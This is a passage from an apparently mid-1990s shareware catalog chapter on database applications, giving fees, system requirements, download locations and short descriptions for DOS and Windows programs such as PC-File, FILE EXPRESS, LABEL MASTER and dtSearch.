(01-27-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, BBS, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: CREST231.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CREST.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 6 (or contact userID 73567,1547 for assistance). + SWREG#: 1581 + Download size: 328k (about 25 minutes with a 2400 baud modem) + Description: + Database program to keep track of expenses and time spent while + restoring vintage cars. It will also maintain a database of + parts dealers, car shows, swap meets, etc. Includes an + appointment calendar and a pop-up calculator. View and print + reports and mailing labels. Easy to learn and use. Context + sensitive online help. + + Chapter 5, "Database applications" 276 + + + + Product: Computer System Manager + Author: RMH Computer Services, 317-782-9903 + Version: 1.41 (02-19-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $29.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: CSM141.ZIP on BBSs (call 317-784-2147 to download it at + no charge); CSM.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 7 + (or contact userID 73567,1547 for assistance). + SWREG#: 1371 + Download size: 430k (about 32 minutes with a 2400 baud modem) + Description: + Comprehensive computer system equipment tracking. Ideal for + home users, small business, and corporate system managers. + Information can be tracked to individual computer systems + noting model & serial numbers, install dates, warranty + expiration, etc. Set up an inventory for unassigned equipment + and spare parts. Free form report writer. Full customization of + screen colors, file indexes, printer, and validation tables + including Vendor, Hardware and Software types. Context + sensitive online help. + + + Product: DATABASE BROWSER + Author: Redei Enterprises, 310-832-6984 + Version: 1.21 (04-15-95) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Strongly recommended: SVGA monitor; Mouse; Network (LAN); XMS + memory; math coprocessor. + Registration fee: $49.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 1734k (about 129 minutes with a 2400 baud modem) + Description: + An easy to use tool with full edit, query, sorting and printing + capabilities. It supports MS Access 1.1 & 2.0 (.MDB), dBase + III&IV, FoxPro 2.0&2.5 (.DBF), Paradox (.DB) and Btrieve + (.DDF&.DAT). Records are displayed in a scrollable grid in + which columns may be moved, resized. It provides QBE, zooming. + Masking for numeric fields. LAN support. Calculated columns and + totals. Reports to printer, to text file and to clipboard. + Remote usage from other Windows applications. + + Chapter 5, "Database applications" 277 + + + + Product: Easy Base + Author: Easy Software, 01625-614669 + Version: 9.0 (06-10-95) + Needs: IBM PC, DOS 5.0 or better. 1024k RAM; Hard disk. + Registration fee: $49.00 + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 3043 + PsL#: 11489 + Download size: 984k (about 73 minutes with a 2400 baud modem) + Description: + The first true Rapid Application Development (RAD) system + available on shareware. you can create sophisticated menu + driven data management applications in record time. + + + Product: HouseHold TRACKER + Author: Fischer Grafix & Software, 714-898-7262 + Version: 1.6 (10-29-93) + Needs: IBM PC, DOS 3.3 or better. Hard disk. + Registration fee: $18.50 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products. + Look for: FMSHT.ZIP on BBSs; FGSHT.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (or contact userID 70233,1315 for + assistance). + Download size: 281k (about 21 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Keeps track of many of the items around the house in one + database. Items like household goods (model #'s, serial #'s, + cost, warranties, etc.), auto repairs, VCR tapes, magazine + subscriptions, phone list, utilities and credit cards. The + program will print your list for insurance purposes or make a + label for your VCR tape. Easy to use menus. + + + Product: MCBase + Relational music collection database system. See full + description on page 590. + + Product: Office Supplies Tracker + Office supplies ordering/inventory system. See full + description on page 331. + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 318. + + Chapter 5, "Database applications" 278 + + + + Product: PC-File + Author: ButtonWare, Inc., 206-454-0479 + Version: 7.0 (05-01-93) + Needs: IBM PC, DOS 3.0 or better. 450k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: $89.90 (add $8.50 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of toll 900# phone, fax, BBS, + CompuServe support; 2-month return policy; discounts on other + products. + Look for: PCF70*.ZIP on BBSs (multiple files) (call 206-454-7875 + to download it at no charge); PCF70*.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 3 (multiple files) (or contact userID + 73230,1363 for assistance). + Download size: 895k (about 67 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + This database is easy to use and helps you organize, update, + retrieve and manipulate information. dBase compatible, it + analyzes and manages data with relational retrieve and posting, + search/query, duplicate record check and global update. Create + reports, graphs and charts, mailing labels, mail merge letters. + Plus bar code printer support, autodialer, macros, and graphic + interface fully accessible with a mouse or keyboard. Multiple + views of databases, more data validation, spell checking. + + + Product: PC-HAM + HAM logging, contest and SS game simulation. See full + description on page 609. + + Product: QUALITY MANAGEMENT SYSTEM + An accounting system for property managers. See full + description on page 366. + + Product: RexxBase + The dBase Database For Rexx. See full description on page 455. + + Product: SC-Scripter + SQL server (MS/Sybase) DB script generator. See full + description on page 303. + + Chapter 5, "Database applications" 279 + + + + Product: Schooner + Author: Jonathan Cook, 209-299-4950 + Version: 2.50 GUI (03-14-95) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer. + Registration fee: $39.95 + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; royalty-free runtime + license; bonus utilities; bonus data; bonus graphics. + Look for: SCH250.ZIP on BBSs; SCHOON.ZIP on CompuServe in CIS:IBM + forum LIBrary 0 (or contact userID 72672,2502 for assistance). + Download size: 490k (about 37 minutes with a 2400 baud modem) + Description: + A complete software application development system that allows + you to build powerful DOS graphical user interface (GUI) + software applications. dBASE III Plus file compatible and + Clipper '87 compiler compatible code. + + + Product: Search-N-Store + Author: Shawn Anderson SoftWare, 309-787-4967-(X227) + Version: 3.4 (06-14-94) + Needs: IBM AT (80286), DOS 2.11 or better. 350k RAM. + Strongly recommended: Hard disk; Mouse; Network (LAN). Disk + cache. + Registration fee: $50.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + A network ready, multi-user or stand alone database with lots + of search and print options. Uses text style graphics. A + database utility is included. + + + Product: SoundMasterDb + Audio library cataloging program. See full description on + page 635. + + + 5.2 Flat-file database managers + + See also: Database applications, Mailing list systems. + + Product: Book Librarian + Book cataloging program. See full description on page 522. + + Chapter 5, "Database applications" 280 + + + + Product: buttonFile + Author: ButtonWare, Inc., 206-454-0479 + Version: 1.0 (07-01-93) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk; + Mouse. + Strongly recommended: VGA monitor; Hayes-compatible modem. + Registration fee: $69.90 (add $6.50 for shipping to U.S. + addresses) (add $6.50 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of toll 900# phone, fax, BBS, + CompuServe support; 2-month return policy; discounts on other + products. card decks. + Look for: BFIL1*.ZIP on BBSs (multiple files) (call 206-454-7875 + to download it at no charge); BFIL1*.ZIP on CompuServe in + CIS:WINADV forum LIBrary 15 (multiple files) (or contact userID + 73230,1363 for assistance). + Download size: 460k (about 34 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + This Windows personal filer is a combination Rolodex, address + book and autodialer. Store names, addresses and muliple phone + numbers on 19 pre-defined cards; manage and maintain multiple + address files; auto-dial any phone number and create a list of + frequently used speed dial numbers; print mailing labels, + reports, 3x5 cards. Search using names, numbers, "sounds + like". Import/export to Windows cardfile, ASCII, dBase and + WordPerfect. Design your own card decks and reports by drawing + them. + + + Product: Calling Cards + Combination Rolodex - Yellow Pages program. See full + description on page 158. + + Product: DATA MASTER + Author: RKS Software, Inc., 703-534-1726 + Version: 3.1 (11-24-93) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; CGA monitor; Hard + disk. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; royalty-free runtime + license; LAN license; all ASP-wide offers (see page 6); + + Chapter 5, "Database applications" 281 + + + + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DM31.ZIP on BBSs (call 703-534-7812 to download it at + no charge); DM31.ZIP on CompuServe in CIS:IBMAPP forum LIBrary + 3 (or contact userID 72357,2034 for assistance). + SWREG#: 367 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Complete dbase database management program. Create, modify, and + sort standard dbase files. Contains report writer, form letter + utility, mailing label utility, duplicate checker, statistical + analysis, time period analysis, weights & measures conversion, + etc. Converts from dbase to Lotus 1-2-3, and vice versa. Much + more. + + + Product: FILE EXPRESS + Author: Expressware Corporation, 206-788-0932 + Version: 5.1 (12-10-93) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; CGA monitor; Dual + 720k floppy drives. + Strongly recommended: Hard disk. + Registration fee: $99.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; bonus + templates; discounts on upgrades. 1-month free upgrading + allowed. + Look for: FE51*.ZIP on BBSs (multiple files) (call 206-788-4008 + to download it at no charge); FE51*.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 3 (multiple files) (or contact userID + 75226,2020 for assistance). + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + An easy to use flat file database manager with relational + lookup and update capabilities. Handles over 2 billion records + per database, 200 fields per record, 1000 characters per field + and 4000 characters per record. Includes extensive searching, + reporting, label printing, importing, exporting and duplicate + searching. Database formats can be changed at any time without + losing data. Formula handler includes over 60 string and + numeric functions. Includes an auto-dialer. Supports 300+ + printers. + + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 290. + + Product: Household Register + Home/office inventory program. See full description on + page 590. + + Chapter 5, "Database applications" 282 + + + + Product: LABEL MASTER + Mailing list manager - PC Mag editors choice. See full + description on page 286. + + Product: Layout + Office layout and equipment inventory. See full description on + page 339. + + Product: Little Lists [***] + Author: R.K. West Consulting + Version: 3.2 (07-28-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on other products; discounts on upgrades. + Look for: LLIST32.ZIP on BBSs; LITTLE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10938 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Database program for users who want to keep things simple. + Create exactly the list you want, without prior knowledge of + programming or database systems. Add, view, change records, + browse through the list, print reports & labels including only + the fields you want, sort the records any way you like, perform + simple math, add & change fields, import/export ASCII and DBF + files. + + + Product: MicroPlayerCD(tm) + Play audio CDs on your computer's CDROM drive. See full + description on page 85. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 355. + + Product: PC-File + Easy to use, dBase compat, relational lookup. See full + description on page 277. + + Chapter 5, "Database applications" 283 + + + + Product: q&dBase for Windows + Author: Q&D Software Development, 201-635-1824 + Version: 2.0a (10-23-94) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $27.50 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: QDBW.ZIP on BBSs (call 201-886-8048 to download it at + no charge); QDBW.ZIP on CompuServe in CIS:IBMAPP forum LIBrary + 7 (or contact userID 76336,3271 for assistance). + SWREG#: 3598 + PsL#: 11656 + Download size: 660k (about 49 minutes with a 2400 baud modem) + Description: + The only shareware program that allows you to create and define + your own databases, design your own data entry forms, create + and store report queries, design report layouts, and store all + data in MS-Access 2.0 format for easy portability. Includes + print preview feature and on-line context sensitive Windows + help system. + + + Product: RMS-III: Ref.Mgn.Sys. + Menu based biblio/reference system. See full description on + page 246. + + Product: Video Librarian + Video library cataloging program. See full description on + page 627. + + + 5.3 Mailing list systems + + See also: Database applications, Flat-file database managers; + Utilities, Printer utilities, Envelope addressers. + + Product: APT Mailing Assistant + Print envelopes/labels/bulk mail with POSTNET. See full + description on page 96. + + Product: buttonFile + Easy Windows personal filer, predefined cards. See full + description on page 279. + + Product: dbDIAL(tm) + 7k TSR database/dialer. See full description on page 159. + + Chapter 5, "Database applications" 284 + + + + Product: FILE EXPRESS + Powerful, easy DBMS with relational features. See full + description on page 281. + + Product: FundRaiser Basic + Donor management software for nonprofits. See full description + on page 363. + + Product: GRAB Plus(r) + Envelope addressor & database. See full description on + page 97. + + Product: LABEL MASTER + Author: RKS Software, Inc., 703-534-1726 + Version: 5.1c (11-24-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Strongly recommended: Hercules monitor. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; royalty-free runtime + license; LAN license; all ASP-wide offers (see page 6); disks + of other shareware; discounts on other products. 12-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: LM51C.ZIP on BBSs (call 703-534-7812 to download it at + no charge); LM51C.ZIP on CompuServe in CIS:IBMAPP forum LIBrary + 9 (or contact userID 72357,2034 for assistance). + SWREG#: 366 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A complete mailing list management program which received PC + Magazine's editors choice award. Includes barcoding and ZIP- + PLUS-4 conversion. Maintains an unlimited number of names and + addresses, automatically maintains name, zip code, and company + name sorting, prints labels of any size, supports all dot + matrix and laserjet printers, includes a form letter utility, a + superb report writer, duplicate checking, search and replace on + any field, and much more. + + + Product: Little Lists [***] + Easy-to-use database system. See full description on page 282. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 355. + + Product: OMS (Organizational Mgmt System + Management system for non-profit orgs. See full description on + page 370. + + Chapter 5, "Database applications" 285 + + + + Product: Plain Vanilla Labels + Author: Rosewood Software, 416-284-6119 + Version: 3.15 (01-10-93) + Needs: IBM PC, DOS 2.11 or better. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; lifetime + limited return policy; runtime license; all ASP-wide offers + (see page 6); disks of other shareware. + Look for: PVL316.ZIP on BBSs; PV316.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 10 (or contact userID 70461,2507 for + assistance). + Download size: 93k (about seven minutes with a 2400 baud modem) + Description: + An easy-to-use label program which uses standard 31/2" by 15/16" + tractor feed labels. Labels can be stored in up to 10 files, or + a label can be printed without saving the data. Each label file + can have its own set of macros to make data entry easier. Data + can be indexed at any point in each label. Remarks can be + "hidden" in any part of the label so that they can be seen by + the user but not printed on the label. Has a sophisticated + search function. + + + Product: PostCardMaster + Author: Unicorn Software Limited, 816-429-3558 + Version: 4.20 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor. IBM Graphics printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: PCM420.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PCMSTR.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 9 (or contact userID 70272,3317 for assistance). + SWREG#: 80 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Designed to help uUsers compose post cards and maintain + addresses. The address feature has entries for name, + salutation, code, 3 line address and a line for zipcode, + telephone number, and a remarks line. Printouts include + listings of the addresses, address labels, 3X5 cards, 8 types/ + sizes of post cards or Rolodex cards and response cards that + pre-print a response from the addressee to mail to the + originator. Post cards cost 1/3 less than a letter and in some + cases are equally as good ie meetings. + + Chapter 5, "Database applications" 286 + + + + Product: PrintEnvelope + Complete mail addressing system for Windows. See full + description on page 98. + + Product: Public Address + Author: Paradise Programming, 206-866-3781 + Version: 3.1 (10-05-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk; HP LaserJet printer; Epson + printer. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on upgrades. 3 free update disk(s) sent + out. + Look for: PA310.ZIP on BBSs; PUBADD.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 9 (or contact userID 70322,231 for + assistance). + Download size: 154k (about twelve minutes with a 2400 baud modem) + Description: + Full featured address manager. Prints pre-defined labels and + enevlopes for dot-matrix or laser printers. Searches on most + feilds. Unlimited records, and groups. Supports international + addresses and character set. Dynamic menus allow you to change + the menus to your native language. No more waisted laser labels + because you can start printing from anywhere on a sheet. + Supports up to six return address for envelopes. + + + Product: Simply Labels + Free form label program with many features. See full + description on page 89. + + Product: UnderBar + Automatic printing of POSTNET bar codes. See full description + on page 99. + + Product: WinGRAB for Windows + Windows phone contact mgr & envelope printing. See full + description on page 100. + + Product: WonderBar + TSR to print POSTNET bar code for mailing. See full + description on page 101. + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 306. + + Chapter 5, "Database applications" 287 + + + + 5.4 Freeform/text database managers + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 166. + + Product: dtSearch for DOS + Author: DT Software, Inc., 703-521-9427 + Version: 2.0 (04-14-93) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Hard disk. + Registration fee: $99.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, mail support. 2-month return policy. + Look for: DTS*.ZIP on BBSs (multiple files); DTSD.EXE on + CompuServe in CIS:IBMAPP forum LIBrary 2 (multiple files) (or + contact userID 72607,3323 for assistance). + Download size: 548k (about 41 minutes with a 2400 baud modem) + Description: + Fast, powerful, and easy to use text retrieval program for Ami + Pro, WordPerfect, WordStar, Word, MS Works, Multimate, RTF, and + Ascii documents. Performs indexed, unindexed and combination + searches (up to 15,000 documents per index); wildcard, boolean, + phrase, proximity, and segment searches; displays retrieved + files in multiple, overlapping windows; network support; + international language support; built-in editor; application + launching; mouse support. Fully compatible with Windows + version. + + + Product: dtSearch for Windows + Author: DT Software, Inc., 703-521-9427 + Version: 2.0 (04-14-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $99.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, mail support. 2-month return policy. + Look for: DTS*.ZIP on BBSs (multiple files); DTSW.EXE on + CompuServe in CIS:IBMAPP forum LIBrary 2 (multiple files) (or + contact userID 72607,3323 for assistance). + Download size: 512k (about 38 minutes with a 2400 baud modem) + Description: + Fast, powerful, and easy to use text retrieval program for Ami + Pro, WordPerfect, WordStar, Word, MS Works, Multimate, RTF, and + Ascii documents. Performs indexed, unindexed and combination + searches (up to 15,000 documents per index); wildcard, boolean, + phrase, proximity, and segment searches; displays retrieved + + Chapter 5, "Database applications" 288 + + + + files in multiple, overlapping windows; network support; + international language support; application launching; mouse + support. Fully compatible with DOS version. + + + Product: HOLD-ANYTHING! + Author: Elk Creek Software + Version: 1.1 (02-21-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Modem. + Registration fee: $19.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of CompuServe, mail support; disks of other shareware. + Look for: HOLD11.ZIP on BBSs; HOLD11.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 7 (or contact userID 70640,1614 for + assistance). + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + An extremely easy to use program which keeps track of any kind + of data! No database setup required - just start entering your + data. A great multi-purpose database program with a slick + interface. A mouse is fully supported. Records are quickly + located by typing the first few letters of an item's name, or + by picking from a list. Holds multiple categories of data. + You'll think of new uses for it all the time, e.g. notes, time + tracking, hobby collections, log book, address book, inventory, + etc. + + + Product: Plain Vanilla Labels + Simple but complete label printer. See full description on + page 284. + + Chapter 5, "Database applications" 289 + + + + Product: RACONTEX + Author: Guy Software + Version: 3.23 (11-20-93) + Needs: IBM PC, DOS 3.2 or better. VBRUN300.DLL (if used under + Windows). + Strongly recommended: Hard disk. + Registration fee: $99.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; all ASP- + wide offers (see page 6). 3-month free upgrading allowed. + Look for: RACONTEX.ZIP on BBSs (multiple files) (call + 604-736-3453 to download it at no charge); RACONT.ZIP on + CompuServe in CIS:IBMAPP forum LIBrary 7 (or contact userID + 71750,1036 for assistance). + SWREG#: 92 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Competition for FolioViews, AskSam, Zyindex and the STAIRS + mainframe product. This indexing text search and retrieval + system is useful for legal transcript, statutes (laws), + manuals, etc. Ideal to produce on-line manuals for software. + Includes word proximity search features. Because it pages in + its indexes and files, Racontex works well over a local area + network since it does not have to read the whole file to do a + search. Includes a windows front end for DOSophobes! + + + Product: Recon + Full management of CompuServe message files. See full + description on page 424. + + + 5.5 Database utilities + + Product: Bigsort + Author: MeadowBrook Industries, Ltd. + Version: 1.02 (10-01-93) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Hard disk. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited mail support; 3-month + limited return policy. + Look for: BSORT102.ZIP on BBSs. + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + A fast, general purpose sorting utility for massive amounts of + data. Handles various record formats, including fixed length, + variable length, dBASE, and comma delimited records. The + sorting keys can be customized to contain up to 8 fields, each + with independent length, byte ordering, and case sensitivity + fields. Up to 8 input files can be used with a single output + + Chapter 5, "Database applications" 290 + + + + file. Files can be up to 2GB, and each record can be up to + 64KB. Compare this to DOS sort! + + + Product: DATA MASTER + Database management program. See full description on page 280. + + Product: EMERI + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 1.3 (05-01-93) + Needs: IBM PC, Windows 3.0 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $16.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products. + Look for: EMERI13.ZIP on BBSs (call 401-767-3931 to download it + at no charge); EMERI1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + The CardFile program that comes free with Microsoft Windows is + a truly handy little "Applet" for managing phone numbers and + addresses, etc. Unfortunately, for those of us who bounce in + and out of Windows, Murphy's Law dictates that we'll be staring + at a DOS prompt when we need quick access to our Cardfiles! + This DOS-based program browses Windows Cardfiles. Optimized + for quick, easy "hits" on the card you're looking for. Offers + partially qualified searches, and more! + + + Product: Little Lists [***] + Easy-to-use database system. See full description on page 282. + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 156. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 294. + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 282. + + Product: Recap [***] + Fix capitalization in dBase-compatible files. See full + description on page 294. + + Chapter 5, "Database applications" 291 + + + + Product: SC-Scripter + SQL server (MS/Sybase) DB script generator. See full + description on page 303. + + Product: SuperDIR [***] + DIR util, incl/excl masks, DB output, src av. See full + description on page 33. + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 306. + + 5.5.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: Extract It + Report Data Extractor. See full description on page 60. + + Product: WinBrowse + Author: Q&D Software Development, 201-635-1824 + Version: 1.6a (04-17-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $22.50 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 6). Lifetime free upgrading allowed. + Look for: WINBRS16.ZIP on BBSs; WINBRS.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 4307 + PsL#: 11861 + Download size: 1140k (about 85 minutes with a 2400 baud modem) + Description: + A multiple PC database utility which allows browsing, editing, + and reporting of data using any of several different popular PC + database formats. dBase III+, dBase IV, FoxPro 2.0, 2.5, 2.6, + Paradox 3.x, 4.x, and Access 2.0 formats supported. Even lets + you transfer data from one format to another! Create sorts and + filters on any or all fields using any supported format. + + + 5.6 Software tools & add-ins + + See also: Computer programming, Languages; Computer + programming, Software tools & add-ins. + + Chapter 5, "Database applications" 292 + + + + 5.6.1 For multiple programs + + Product: 4Print/4Book DOS + Paper saving utility for LaserJets & DeskJets. See full + description on page 106. + + Product: 4Print/4Book Windows + 4Print/4Book DOS + 4PrinW Windows interface. See full + description on page 106. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real batch language you wish DOS had. See full description + on page 125. + + Product: PopDBF + Author: Lighthouse Software, Inc., 309-673-9886 + Version: 4.05 (07-29-92) + Needs: IBM PC, DOS 3.0 or better. 4k RAM. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone, fax, CompuServe, mail + support; 2-month limited return policy. + Look for: POPDBF??.ZIP on BBSs (call 414-789-4210 to download it + at no charge); POPDBF.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 3 (or contact userID 76665,736 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A 4K TSR that provides "Instant Access to X-Base Files". Here + are just a few of its features: + * Easily select ANY database, any drive + * Append, browse, delete, and edit records + * Delete, pack and zap databases + * Lightning fast search of entire record or selected + field(s) + * View structure + * Print structure or records (browse or edit format) to a + printer or file + * View index expressions (.IDX, .NDX, .NTX) + * Network 